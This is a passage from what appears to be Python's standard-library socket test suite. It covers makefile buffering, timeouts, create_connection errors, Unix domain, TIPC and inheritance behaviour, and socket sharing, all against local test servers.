self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
            # Data has not arrived yet (can happen under Windows); wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
        # do not have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
